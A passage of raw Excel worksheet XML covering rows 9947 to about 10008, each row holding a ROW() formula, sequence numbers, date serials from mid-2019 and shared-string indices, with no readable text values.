      <c r="D9947" s="1">
        <v>43673</v>
      </c>
      <c r="E9947" t="s">
        <v>19530</v>
      </c>
      <c r="F9947" t="s">
        <v>9975</v>
      </c>
      <c r="G9947" t="s">
        <v>19531</v>
      </c>
    </row>
    <row r="9948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9948">
        <f t="shared" si="155"/>
        <v>9947</v>
      </c>
      <c r="B9948">
        <v>4947</v>
      </c>
      <c r="C9948" t="s">
        <v>9973</v>
      </c>
      <c r="D9948" s="1">
        <v>43674</v>
      </c>
      <c r="E9948" t="s">
        <v>19532</v>
      </c>
      <c r="F9948" t="s">
        <v>9975</v>
      </c>
      <c r="G9948" t="s">
        <v>19533</v>
      </c>
    </row>
    <row r="9949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9949">
        <f t="shared" si="155"/>
        <v>9948</v>
      </c>
      <c r="B9949">
        <v>4948</v>
      </c>
      <c r="C9949" t="s">
        <v>9973</v>
      </c>
      <c r="D9949" s="1">
        <v>43676</v>
      </c>
      <c r="E9949" t="s">
        <v>19534</v>
      </c>
      <c r="F9949" t="s">
        <v>9975</v>
      </c>
      <c r="G9949" t="s">
        <v>19535</v>
      </c>
    </row>
    <row r="9950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9950">
        <f t="shared" si="155"/>
        <v>9949</v>
      </c>
      <c r="B9950">
        <v>4949</v>
      </c>
      <c r="C9950" t="s">
        <v>9973</v>
      </c>
      <c r="D9950" s="1">
        <v>43669</v>
      </c>
      <c r="E9950" t="s">
        <v>19536</v>
      </c>
      <c r="F9950" t="s">
        <v>9975</v>
      </c>
      <c r="G9950" t="s">
        <v>19537</v>
      </c>
    </row>
    <row r="9951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9951">
        <f t="shared" si="155"/>
        <v>9950</v>
      </c>
      <c r="B9951">
        <v>4950</v>
      </c>
      <c r="C9951" t="s">
        <v>9973</v>
      </c>
      <c r="D9951" s="1">
        <v>43676</v>
      </c>
      <c r="E9951" t="s">
        <v>19538</v>
      </c>
      <c r="F9951" t="s">
        <v>9975</v>
      </c>
      <c r="G9951" t="s">
        <v>19539</v>
      </c>
    </row>
    <row r="9952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9952">
        <f t="shared" si="155"/>
        <v>9951</v>
      </c>
      <c r="B9952">
        <v>4951</v>
      </c>
      <c r="C9952" t="s">
        <v>9973</v>
      </c>
      <c r="D9952" s="1">
        <v>43673</v>
      </c>
      <c r="E9952" t="s">
        <v>19540</v>
      </c>
      <c r="F9952" t="s">
        <v>9975</v>
      </c>
      <c r="G9952" t="s">
        <v>19541</v>
      </c>
    </row>
    <row r="9953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9953">
        <f t="shared" si="155"/>
        <v>9952</v>
      </c>
      <c r="B9953">
        <v>4952</v>
      </c>
      <c r="C9953" t="s">
        <v>9973</v>
      </c>
      <c r="D9953" s="1">
        <v>43674</v>
      </c>
      <c r="E9953" t="s">
        <v>19542</v>
      </c>
      <c r="F9953" t="s">
        <v>9975</v>
      </c>
      <c r="G9953" t="s">
        <v>19543</v>
      </c>
    </row>
    <row r="9954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9954">
        <f t="shared" si="155"/>
        <v>9953</v>
      </c>
      <c r="B9954">
        <v>4953</v>
      </c>
      <c r="C9954" t="s">
        <v>9973</v>
      </c>
      <c r="D9954" s="1">
        <v>43676</v>
      </c>
      <c r="E9954" t="s">
        <v>19544</v>
      </c>
      <c r="F9954" t="s">
        <v>9975</v>
      </c>
      <c r="G9954" t="s">
        <v>19545</v>
      </c>
    </row>
    <row r="9955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9955">
        <f t="shared" si="155"/>
        <v>9954</v>
      </c>
      <c r="B9955">
        <v>4954</v>
      </c>
      <c r="C9955" t="s">
        <v>9973</v>
      </c>
      <c r="D9955" s="1">
        <v>43674</v>
      </c>
      <c r="E9955" t="s">
        <v>19546</v>
      </c>
      <c r="F9955" t="s">
        <v>9975</v>
      </c>
      <c r="G9955" t="s">
        <v>19547</v>
      </c>
    </row>
    <row r="9956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9956">
        <f t="shared" si="155"/>
        <v>9955</v>
      </c>
      <c r="B9956">
        <v>4955</v>
      </c>
      <c r="C9956" t="s">
        <v>9973</v>
      </c>
      <c r="D9956" s="1">
        <v>43673</v>
      </c>
      <c r="E9956" t="s">
        <v>19548</v>
      </c>
      <c r="F9956" t="s">
        <v>9975</v>
      </c>
      <c r="G9956" t="s">
        <v>19549</v>
      </c>
    </row>
    <row r="9957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9957">
        <f t="shared" si="155"/>
        <v>9956</v>
      </c>
      <c r="B9957">
        <v>4956</v>
      </c>
      <c r="C9957" t="s">
        <v>9973</v>
      </c>
      <c r="D9957" s="1">
        <v>43669</v>
      </c>
      <c r="E9957" t="s">
        <v>19550</v>
      </c>
      <c r="F9957" t="s">
        <v>9975</v>
      </c>
      <c r="G9957" t="s">
        <v>19551</v>
      </c>
    </row>
    <row r="9958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9958">
        <f t="shared" si="155"/>
        <v>9957</v>
      </c>
      <c r="B9958">
        <v>4957</v>
      </c>
      <c r="C9958" t="s">
        <v>9973</v>
      </c>
      <c r="D9958" s="1">
        <v>43675</v>
      </c>
      <c r="E9958" t="s">
        <v>19552</v>
      </c>
      <c r="F9958" t="s">
        <v>9975</v>
      </c>
      <c r="G9958" t="s">
        <v>19553</v>
      </c>
    </row>
    <row r="9959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9959">
        <f t="shared" si="155"/>
        <v>9958</v>
      </c>
      <c r="B9959">
        <v>4958</v>
      </c>
      <c r="C9959" t="s">
        <v>9973</v>
      </c>
      <c r="D9959" s="1">
        <v>43669</v>
      </c>
      <c r="E9959" t="s">
        <v>19554</v>
      </c>
      <c r="F9959" t="s">
        <v>9975</v>
      </c>
      <c r="G9959" t="s">
        <v>19555</v>
      </c>
    </row>
    <row r="9960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9960">
        <f t="shared" si="155"/>
        <v>9959</v>
      </c>
      <c r="B9960">
        <v>4959</v>
      </c>
      <c r="C9960" t="s">
        <v>9973</v>
      </c>
      <c r="D9960" s="1">
        <v>43676</v>
      </c>
      <c r="E9960" t="s">
        <v>19556</v>
      </c>
      <c r="F9960" t="s">
        <v>9975</v>
      </c>
      <c r="G9960" t="s">
        <v>19557</v>
      </c>
    </row>
    <row r="9961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9961">
        <f t="shared" si="155"/>
        <v>9960</v>
      </c>
      <c r="B9961">
        <v>4960</v>
      </c>
      <c r="C9961" t="s">
        <v>9973</v>
      </c>
      <c r="D9961" s="1">
        <v>43668</v>
      </c>
      <c r="E9961" t="s">
        <v>19558</v>
      </c>
      <c r="F9961" t="s">
        <v>9975</v>
      </c>
      <c r="G9961" t="s">
        <v>19559</v>
      </c>
    </row>
    <row r="9962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9962">
        <f t="shared" si="155"/>
        <v>9961</v>
      </c>
      <c r="B9962">
        <v>4961</v>
      </c>
      <c r="C9962" t="s">
        <v>9973</v>
      </c>
      <c r="D9962" s="1">
        <v>43673</v>
      </c>
      <c r="E9962" t="s">
        <v>19560</v>
      </c>
      <c r="F9962" t="s">
        <v>9975</v>
      </c>
      <c r="G9962" t="s">
        <v>19561</v>
      </c>
    </row>
    <row r="9963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9963">
        <f t="shared" si="155"/>
        <v>9962</v>
      </c>
      <c r="B9963">
        <v>4962</v>
      </c>
      <c r="C9963" t="s">
        <v>9973</v>
      </c>
      <c r="D9963" s="1">
        <v>43676</v>
      </c>
      <c r="E9963" t="s">
        <v>19562</v>
      </c>
      <c r="F9963" t="s">
        <v>9975</v>
      </c>
      <c r="G9963" t="s">
        <v>19563</v>
      </c>
    </row>
    <row r="9964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9964">
        <f t="shared" si="155"/>
        <v>9963</v>
      </c>
      <c r="B9964">
        <v>4963</v>
      </c>
      <c r="C9964" t="s">
        <v>9973</v>
      </c>
      <c r="D9964" s="1">
        <v>43669</v>
      </c>
      <c r="E9964" t="s">
        <v>19564</v>
      </c>
      <c r="F9964" t="s">
        <v>9975</v>
      </c>
      <c r="G9964" t="s">
        <v>19565</v>
      </c>
    </row>
    <row r="9965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9965">
        <f t="shared" si="155"/>
        <v>9964</v>
      </c>
      <c r="B9965">
        <v>4964</v>
      </c>
      <c r="C9965" t="s">
        <v>9973</v>
      </c>
      <c r="D9965" s="1">
        <v>43677</v>
      </c>
      <c r="E9965" t="s">
        <v>19566</v>
      </c>
      <c r="F9965" t="s">
        <v>9975</v>
      </c>
      <c r="G9965" t="s">
        <v>19567</v>
      </c>
    </row>
    <row r="9966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9966">
        <f t="shared" si="155"/>
        <v>9965</v>
      </c>
      <c r="B9966">
        <v>4965</v>
      </c>
      <c r="C9966" t="s">
        <v>9973</v>
      </c>
      <c r="D9966" s="1">
        <v>43669</v>
      </c>
      <c r="E9966" t="s">
        <v>19568</v>
      </c>
      <c r="F9966" t="s">
        <v>9975</v>
      </c>
      <c r="G9966" t="s">
        <v>19569</v>
      </c>
    </row>
    <row r="9967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9967">
        <f t="shared" si="155"/>
        <v>9966</v>
      </c>
      <c r="B9967">
        <v>4966</v>
      </c>
      <c r="C9967" t="s">
        <v>9973</v>
      </c>
      <c r="D9967" s="1">
        <v>43671</v>
      </c>
      <c r="E9967" t="s">
        <v>19570</v>
      </c>
      <c r="F9967" t="s">
        <v>9975</v>
      </c>
      <c r="G9967" t="s">
        <v>19571</v>
      </c>
    </row>
    <row r="9968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9968">
        <f t="shared" si="155"/>
        <v>9967</v>
      </c>
      <c r="B9968">
        <v>4967</v>
      </c>
      <c r="C9968" t="s">
        <v>9973</v>
      </c>
      <c r="D9968" s="1">
        <v>43672</v>
      </c>
      <c r="E9968" t="s">
        <v>19572</v>
      </c>
      <c r="F9968" t="s">
        <v>9975</v>
      </c>
      <c r="G9968" t="s">
        <v>19573</v>
      </c>
    </row>
    <row r="9969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9969">
        <f t="shared" si="155"/>
        <v>9968</v>
      </c>
      <c r="B9969">
        <v>4968</v>
      </c>
      <c r="C9969" t="s">
        <v>9973</v>
      </c>
      <c r="D9969" s="1">
        <v>43677</v>
      </c>
      <c r="E9969" t="s">
        <v>19574</v>
      </c>
      <c r="F9969" t="s">
        <v>9975</v>
      </c>
      <c r="G9969" t="s">
        <v>19575</v>
      </c>
    </row>
    <row r="9970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9970">
        <f t="shared" si="155"/>
        <v>9969</v>
      </c>
      <c r="B9970">
        <v>4969</v>
      </c>
      <c r="C9970" t="s">
        <v>9973</v>
      </c>
      <c r="D9970" s="1">
        <v>43672</v>
      </c>
      <c r="E9970" t="s">
        <v>19576</v>
      </c>
      <c r="F9970" t="s">
        <v>9975</v>
      </c>
      <c r="G9970" t="s">
        <v>19577</v>
      </c>
    </row>
    <row r="9971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9971">
        <f t="shared" si="155"/>
        <v>9970</v>
      </c>
      <c r="B9971">
        <v>4970</v>
      </c>
      <c r="C9971" t="s">
        <v>9973</v>
      </c>
      <c r="D9971" s="1">
        <v>43668</v>
      </c>
      <c r="E9971" t="s">
        <v>19578</v>
      </c>
      <c r="F9971" t="s">
        <v>9975</v>
      </c>
      <c r="G9971" t="s">
        <v>19579</v>
      </c>
    </row>
    <row r="9972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9972">
        <f t="shared" si="155"/>
        <v>9971</v>
      </c>
      <c r="B9972">
        <v>4971</v>
      </c>
      <c r="C9972" t="s">
        <v>9973</v>
      </c>
      <c r="D9972" s="1">
        <v>43676</v>
      </c>
      <c r="E9972" t="s">
        <v>19580</v>
      </c>
      <c r="F9972" t="s">
        <v>9975</v>
      </c>
      <c r="G9972" t="s">
        <v>19581</v>
      </c>
    </row>
    <row r="9973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9973">
        <f t="shared" si="155"/>
        <v>9972</v>
      </c>
      <c r="B9973">
        <v>4972</v>
      </c>
      <c r="C9973" t="s">
        <v>9973</v>
      </c>
      <c r="D9973" s="1">
        <v>43670</v>
      </c>
      <c r="E9973" t="s">
        <v>19582</v>
      </c>
      <c r="F9973" t="s">
        <v>9975</v>
      </c>
      <c r="G9973" t="s">
        <v>19583</v>
      </c>
    </row>
    <row r="9974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9974">
        <f t="shared" si="155"/>
        <v>9973</v>
      </c>
      <c r="B9974">
        <v>4973</v>
      </c>
      <c r="C9974" t="s">
        <v>9973</v>
      </c>
      <c r="D9974" s="1">
        <v>43672</v>
      </c>
      <c r="E9974" t="s">
        <v>19584</v>
      </c>
      <c r="F9974" t="s">
        <v>9975</v>
      </c>
      <c r="G9974" t="s">
        <v>19585</v>
      </c>
    </row>
    <row r="9975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9975">
        <f t="shared" si="155"/>
        <v>9974</v>
      </c>
      <c r="B9975">
        <v>4974</v>
      </c>
      <c r="C9975" t="s">
        <v>9973</v>
      </c>
      <c r="D9975" s="1">
        <v>43671</v>
      </c>
      <c r="E9975" t="s">
        <v>19586</v>
      </c>
      <c r="F9975" t="s">
        <v>9975</v>
      </c>
      <c r="G9975" t="s">
        <v>19587</v>
      </c>
    </row>
    <row r="9976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9976">
        <f t="shared" si="155"/>
        <v>9975</v>
      </c>
      <c r="B9976">
        <v>4975</v>
      </c>
      <c r="C9976" t="s">
        <v>9973</v>
      </c>
      <c r="D9976" s="1">
        <v>43674</v>
      </c>
      <c r="E9976" t="s">
        <v>19588</v>
      </c>
      <c r="F9976" t="s">
        <v>9975</v>
      </c>
      <c r="G9976" t="s">
        <v>19589</v>
      </c>
    </row>
    <row r="9977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9977">
        <f t="shared" si="155"/>
        <v>9976</v>
      </c>
      <c r="B9977">
        <v>4976</v>
      </c>
      <c r="C9977" t="s">
        <v>9973</v>
      </c>
      <c r="D9977" s="1">
        <v>43669</v>
      </c>
      <c r="E9977" t="s">
        <v>19590</v>
      </c>
      <c r="F9977" t="s">
        <v>9975</v>
      </c>
      <c r="G9977" t="s">
        <v>19591</v>
      </c>
    </row>
    <row r="9978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9978">
        <f t="shared" si="155"/>
        <v>9977</v>
      </c>
      <c r="B9978">
        <v>4977</v>
      </c>
      <c r="C9978" t="s">
        <v>9973</v>
      </c>
      <c r="D9978" s="1">
        <v>43672</v>
      </c>
      <c r="E9978" t="s">
        <v>19592</v>
      </c>
      <c r="F9978" t="s">
        <v>9975</v>
      </c>
      <c r="G9978" t="s">
        <v>19593</v>
      </c>
    </row>
    <row r="9979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9979">
        <f t="shared" si="155"/>
        <v>9978</v>
      </c>
      <c r="B9979">
        <v>4978</v>
      </c>
      <c r="C9979" t="s">
        <v>9973</v>
      </c>
      <c r="D9979" s="1">
        <v>43675</v>
      </c>
      <c r="E9979" t="s">
        <v>19594</v>
      </c>
      <c r="F9979" t="s">
        <v>9975</v>
      </c>
      <c r="G9979" t="s">
        <v>19595</v>
      </c>
    </row>
    <row r="9980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9980">
        <f t="shared" si="155"/>
        <v>9979</v>
      </c>
      <c r="B9980">
        <v>4979</v>
      </c>
      <c r="C9980" t="s">
        <v>9973</v>
      </c>
      <c r="D9980" s="1">
        <v>43672</v>
      </c>
      <c r="E9980" t="s">
        <v>19596</v>
      </c>
      <c r="F9980" t="s">
        <v>9975</v>
      </c>
      <c r="G9980" t="s">
        <v>19597</v>
      </c>
    </row>
    <row r="9981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9981">
        <f t="shared" si="155"/>
        <v>9980</v>
      </c>
      <c r="B9981">
        <v>4980</v>
      </c>
      <c r="C9981" t="s">
        <v>9973</v>
      </c>
      <c r="D9981" s="1">
        <v>43675</v>
      </c>
      <c r="E9981" t="s">
        <v>19598</v>
      </c>
      <c r="F9981" t="s">
        <v>9975</v>
      </c>
      <c r="G9981" t="s">
        <v>19599</v>
      </c>
    </row>
    <row r="9982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9982">
        <f t="shared" si="155"/>
        <v>9981</v>
      </c>
      <c r="B9982">
        <v>4981</v>
      </c>
      <c r="C9982" t="s">
        <v>9973</v>
      </c>
      <c r="D9982" s="1">
        <v>43672</v>
      </c>
      <c r="E9982" t="s">
        <v>19600</v>
      </c>
      <c r="F9982" t="s">
        <v>9975</v>
      </c>
      <c r="G9982" t="s">
        <v>19601</v>
      </c>
    </row>
    <row r="9983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9983">
        <f t="shared" si="155"/>
        <v>9982</v>
      </c>
      <c r="B9983">
        <v>4982</v>
      </c>
      <c r="C9983" t="s">
        <v>9973</v>
      </c>
      <c r="D9983" s="1">
        <v>43673</v>
      </c>
      <c r="E9983" t="s">
        <v>19602</v>
      </c>
      <c r="F9983" t="s">
        <v>9975</v>
      </c>
      <c r="G9983" t="s">
        <v>19603</v>
      </c>
    </row>
    <row r="9984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9984">
        <f t="shared" si="155"/>
        <v>9983</v>
      </c>
      <c r="B9984">
        <v>4983</v>
      </c>
      <c r="C9984" t="s">
        <v>9973</v>
      </c>
      <c r="D9984" s="1">
        <v>43677</v>
      </c>
      <c r="E9984" t="s">
        <v>19604</v>
      </c>
      <c r="F9984" t="s">
        <v>9975</v>
      </c>
      <c r="G9984" t="s">
        <v>19605</v>
      </c>
    </row>
    <row r="9985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9985">
        <f t="shared" si="155"/>
        <v>9984</v>
      </c>
      <c r="B9985">
        <v>4984</v>
      </c>
      <c r="C9985" t="s">
        <v>9973</v>
      </c>
      <c r="D9985" s="1">
        <v>43672</v>
      </c>
      <c r="E9985" t="s">
        <v>19606</v>
      </c>
      <c r="F9985" t="s">
        <v>9975</v>
      </c>
      <c r="G9985" t="s">
        <v>19607</v>
      </c>
    </row>
    <row r="9986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9986">
        <f t="shared" si="155"/>
        <v>9985</v>
      </c>
      <c r="B9986">
        <v>4985</v>
      </c>
      <c r="C9986" t="s">
        <v>9973</v>
      </c>
      <c r="D9986" s="1">
        <v>43676</v>
      </c>
      <c r="E9986" t="s">
        <v>19608</v>
      </c>
      <c r="F9986" t="s">
        <v>9975</v>
      </c>
      <c r="G9986" t="s">
        <v>19609</v>
      </c>
    </row>
    <row r="9987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9987">
        <f t="shared" ref="A9987:A10050" si="156">+ROW(A9986)</f>
        <v>9986</v>
      </c>
      <c r="B9987">
        <v>4986</v>
      </c>
      <c r="C9987" t="s">
        <v>9973</v>
      </c>
      <c r="D9987" s="1">
        <v>43672</v>
      </c>
      <c r="E9987" t="s">
        <v>19610</v>
      </c>
      <c r="F9987" t="s">
        <v>9975</v>
      </c>
      <c r="G9987" t="s">
        <v>19611</v>
      </c>
    </row>
    <row r="9988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9988">
        <f t="shared" si="156"/>
        <v>9987</v>
      </c>
      <c r="B9988">
        <v>4987</v>
      </c>
      <c r="C9988" t="s">
        <v>9973</v>
      </c>
      <c r="D9988" s="1">
        <v>43677</v>
      </c>
      <c r="E9988" t="s">
        <v>12226</v>
      </c>
      <c r="F9988" t="s">
        <v>9975</v>
      </c>
      <c r="G9988" t="s">
        <v>12227</v>
      </c>
    </row>
    <row r="9989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9989">
        <f t="shared" si="156"/>
        <v>9988</v>
      </c>
      <c r="B9989">
        <v>4988</v>
      </c>
      <c r="C9989" t="s">
        <v>9973</v>
      </c>
      <c r="D9989" s="1">
        <v>43672</v>
      </c>
      <c r="E9989" t="s">
        <v>19612</v>
      </c>
      <c r="F9989" t="s">
        <v>9975</v>
      </c>
      <c r="G9989" t="s">
        <v>19613</v>
      </c>
    </row>
    <row r="9990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9990">
        <f t="shared" si="156"/>
        <v>9989</v>
      </c>
      <c r="B9990">
        <v>4989</v>
      </c>
      <c r="C9990" t="s">
        <v>9973</v>
      </c>
      <c r="D9990" s="1">
        <v>43674</v>
      </c>
      <c r="E9990" t="s">
        <v>19614</v>
      </c>
      <c r="F9990" t="s">
        <v>9975</v>
      </c>
      <c r="G9990" t="s">
        <v>19615</v>
      </c>
    </row>
    <row r="9991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9991">
        <f t="shared" si="156"/>
        <v>9990</v>
      </c>
      <c r="B9991">
        <v>4990</v>
      </c>
      <c r="C9991" t="s">
        <v>9973</v>
      </c>
      <c r="D9991" s="1">
        <v>43669</v>
      </c>
      <c r="E9991" t="s">
        <v>19616</v>
      </c>
      <c r="F9991" t="s">
        <v>9975</v>
      </c>
      <c r="G9991" t="s">
        <v>19617</v>
      </c>
    </row>
    <row r="9992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9992">
        <f t="shared" si="156"/>
        <v>9991</v>
      </c>
      <c r="B9992">
        <v>4991</v>
      </c>
      <c r="C9992" t="s">
        <v>9973</v>
      </c>
      <c r="D9992" s="1">
        <v>43668</v>
      </c>
      <c r="E9992" t="s">
        <v>19618</v>
      </c>
      <c r="F9992" t="s">
        <v>10021</v>
      </c>
      <c r="G9992" t="s">
        <v>19619</v>
      </c>
    </row>
    <row r="9993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9993">
        <f t="shared" si="156"/>
        <v>9992</v>
      </c>
      <c r="B9993">
        <v>4992</v>
      </c>
      <c r="C9993" t="s">
        <v>9973</v>
      </c>
      <c r="D9993" s="1">
        <v>43670</v>
      </c>
      <c r="E9993" t="s">
        <v>19620</v>
      </c>
      <c r="F9993" t="s">
        <v>9975</v>
      </c>
      <c r="G9993" t="s">
        <v>19621</v>
      </c>
    </row>
    <row r="9994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9994">
        <f t="shared" si="156"/>
        <v>9993</v>
      </c>
      <c r="B9994">
        <v>4993</v>
      </c>
      <c r="C9994" t="s">
        <v>9973</v>
      </c>
      <c r="D9994" s="1">
        <v>43668</v>
      </c>
      <c r="E9994" t="s">
        <v>10611</v>
      </c>
      <c r="F9994" t="s">
        <v>9978</v>
      </c>
      <c r="G9994" t="s">
        <v>19622</v>
      </c>
    </row>
    <row r="9995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9995">
        <f t="shared" si="156"/>
        <v>9994</v>
      </c>
      <c r="B9995">
        <v>4994</v>
      </c>
      <c r="C9995" t="s">
        <v>9973</v>
      </c>
      <c r="D9995" s="1">
        <v>43674</v>
      </c>
      <c r="E9995" t="s">
        <v>19623</v>
      </c>
      <c r="F9995" t="s">
        <v>9975</v>
      </c>
      <c r="G9995" t="s">
        <v>19624</v>
      </c>
    </row>
    <row r="9996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9996">
        <f t="shared" si="156"/>
        <v>9995</v>
      </c>
      <c r="B9996">
        <v>4995</v>
      </c>
      <c r="C9996" t="s">
        <v>9973</v>
      </c>
      <c r="D9996" s="1">
        <v>43668</v>
      </c>
      <c r="E9996" t="s">
        <v>19625</v>
      </c>
      <c r="F9996" t="s">
        <v>9975</v>
      </c>
      <c r="G9996" t="s">
        <v>19626</v>
      </c>
    </row>
    <row r="9997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9997">
        <f t="shared" si="156"/>
        <v>9996</v>
      </c>
      <c r="B9997">
        <v>4996</v>
      </c>
      <c r="C9997" t="s">
        <v>9973</v>
      </c>
      <c r="D9997" s="1">
        <v>43668</v>
      </c>
      <c r="E9997" t="s">
        <v>19627</v>
      </c>
      <c r="F9997" t="s">
        <v>9975</v>
      </c>
      <c r="G9997" t="s">
        <v>19628</v>
      </c>
    </row>
    <row r="9998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9998">
        <f t="shared" si="156"/>
        <v>9997</v>
      </c>
      <c r="B9998">
        <v>4997</v>
      </c>
      <c r="C9998" t="s">
        <v>9973</v>
      </c>
      <c r="D9998" s="1">
        <v>43671</v>
      </c>
      <c r="E9998" t="s">
        <v>19629</v>
      </c>
      <c r="F9998" t="s">
        <v>9975</v>
      </c>
      <c r="G9998" t="s">
        <v>19630</v>
      </c>
    </row>
    <row r="9999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A9999">
        <f t="shared" si="156"/>
        <v>9998</v>
      </c>
      <c r="B9999">
        <v>4998</v>
      </c>
      <c r="C9999" t="s">
        <v>9973</v>
      </c>
      <c r="D9999" s="1">
        <v>43676</v>
      </c>
      <c r="E9999" t="s">
        <v>19631</v>
      </c>
      <c r="F9999" t="s">
        <v>9975</v>
      </c>
      <c r="G9999" t="s">
        <v>19632</v>
      </c>
    </row>
    <row r="10000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10000">
        <f t="shared" si="156"/>
        <v>9999</v>
      </c>
      <c r="B10000">
        <v>4999</v>
      </c>
      <c r="C10000" t="s">
        <v>9973</v>
      </c>
      <c r="D10000" s="1">
        <v>43677</v>
      </c>
      <c r="E10000" t="s">
        <v>19633</v>
      </c>
      <c r="F10000" t="s">
        <v>9975</v>
      </c>
      <c r="G10000" t="s">
        <v>19634</v>
      </c>
    </row>
    <row r="10001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10001">
        <f t="shared" si="156"/>
        <v>10000</v>
      </c>
      <c r="B10001">
        <v>5000</v>
      </c>
      <c r="C10001" t="s">
        <v>9973</v>
      </c>
      <c r="D10001" s="1">
        <v>43672</v>
      </c>
      <c r="E10001" t="s">
        <v>19635</v>
      </c>
      <c r="F10001" t="s">
        <v>9975</v>
      </c>
      <c r="G10001" t="s">
        <v>19636</v>
      </c>
    </row>
    <row r="10002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10002">
        <f t="shared" si="156"/>
        <v>10001</v>
      </c>
      <c r="B10002">
        <v>1</v>
      </c>
      <c r="C10002" t="s">
        <v>19637</v>
      </c>
      <c r="D10002" s="1">
        <v>43719</v>
      </c>
      <c r="E10002" t="s">
        <v>19638</v>
      </c>
      <c r="F10002" t="s">
        <v>10021</v>
      </c>
      <c r="G10002" t="s">
        <v>19639</v>
      </c>
    </row>
    <row r="10003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10003">
        <f t="shared" si="156"/>
        <v>10002</v>
      </c>
      <c r="B10003">
        <v>2</v>
      </c>
      <c r="C10003" t="s">
        <v>19637</v>
      </c>
      <c r="D10003" s="1">
        <v>43737</v>
      </c>
      <c r="E10003" t="s">
        <v>19640</v>
      </c>
      <c r="F10003" t="s">
        <v>9975</v>
      </c>
      <c r="G10003" t="s">
        <v>19641</v>
      </c>
    </row>
    <row r="10004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10004">
        <f t="shared" si="156"/>
        <v>10003</v>
      </c>
      <c r="B10004">
        <v>3</v>
      </c>
      <c r="C10004" t="s">
        <v>19637</v>
      </c>
      <c r="D10004" s="1">
        <v>43727</v>
      </c>
      <c r="E10004" t="s">
        <v>19640</v>
      </c>
      <c r="F10004" t="s">
        <v>9975</v>
      </c>
      <c r="G10004" t="s">
        <v>19642</v>
      </c>
    </row>
    <row r="10005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10005">
        <f t="shared" si="156"/>
        <v>10004</v>
      </c>
      <c r="B10005">
        <v>4</v>
      </c>
      <c r="C10005" t="s">
        <v>19637</v>
      </c>
      <c r="D10005" s="1">
        <v>43733</v>
      </c>
      <c r="E10005" t="s">
        <v>19643</v>
      </c>
      <c r="F10005" t="s">
        <v>10021</v>
      </c>
      <c r="G10005" t="s">
        <v>19644</v>
      </c>
    </row>
    <row r="10006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10006">
        <f t="shared" si="156"/>
        <v>10005</v>
      </c>
      <c r="B10006">
        <v>5</v>
      </c>
      <c r="C10006" t="s">
        <v>19637</v>
      </c>
      <c r="D10006" s="1">
        <v>43719</v>
      </c>
      <c r="E10006" t="s">
        <v>19645</v>
      </c>
      <c r="F10006" t="s">
        <v>9975</v>
      </c>
      <c r="G10006" t="s">
        <v>19646</v>
      </c>
    </row>
    <row r="10007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10007">
        <f t="shared" si="156"/>
        <v>10006</v>
      </c>
      <c r="B10007">
        <v>6</v>
      </c>
      <c r="C10007" t="s">
        <v>19637</v>
      </c>
      <c r="D10007" s="1">
        <v>43737</v>
      </c>
      <c r="E10007" t="s">
        <v>19640</v>
      </c>
      <c r="F10007" t="s">
        <v>9975</v>
      </c>
      <c r="G10007" t="s">
        <v>19647</v>
      </c>
    </row>
    <row r="10008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10008">
        <f t="shared" si="156"/>
        <v>10007</v>
      </c>
      <c r="B10008">
        <v>7</v>
      </c>
